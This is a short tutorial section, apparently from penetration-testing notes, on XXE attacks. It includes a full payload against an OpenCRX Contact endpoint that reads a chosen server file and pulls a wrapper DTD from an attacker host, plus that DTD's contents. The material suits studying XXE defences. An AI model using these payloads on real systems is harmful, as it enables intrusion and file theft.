Advanced file access with CDATA
We initially discuss XML External Entities (XXE) exploits in XML External Entities, Retrieving Files, however, the examples provided don’t account for the content we’re trying to leak being valid XML, causing the XML parser to parse the contents of the file we’re trying to leak. This likely causes the parser to prematurely halt the processing of our data.
Using the CDATA directive, we can instruct XML to ignore parsing elements within our data - just give us the raw information from the file referenced. Here’s an example XXE payload:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % start "<![CDATA[">
<!ENTITY % file SYSTEM "file://{FILEPATH}" >
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://{LHOST}:{LPORT}/wrapper.dtd" >
%dtd;
]>
<org.opencrx.kernel.account1.Contact>
<lastName>&wrapper;</lastName>
<firstName>Tom</firstName>
</org.opencrx.kernel.account1.Contact>In the above example, we define the start entity to be the start of the
CDATA XML entity. We specify which file we want to leak with the file
entity. Finally, we end the CDATA XML entity with the end entity. How do we
end up combining these elements?
We host a
Document Type Definition (DTD) and
reference it as an external entity. This external entity will combine the
start, file, and end entities as one final entity, wrapper. We invoke
the dtd entity, causing the victim host’s XML parser to download the
wrapper.dtd DTD file from our attacker host. The contents of the wrapper.dtd
payload are provided below:
<!ENTITY wrapper "%start;%file;%end;">Once the victim host successfully download’s the wrapper.dtd DTD file, we
invoke the wrapper entity, causing the victim host to retrieve the file
specified by the file entity, and placing it in our CDATA entity for easy
exposure without XML parsing.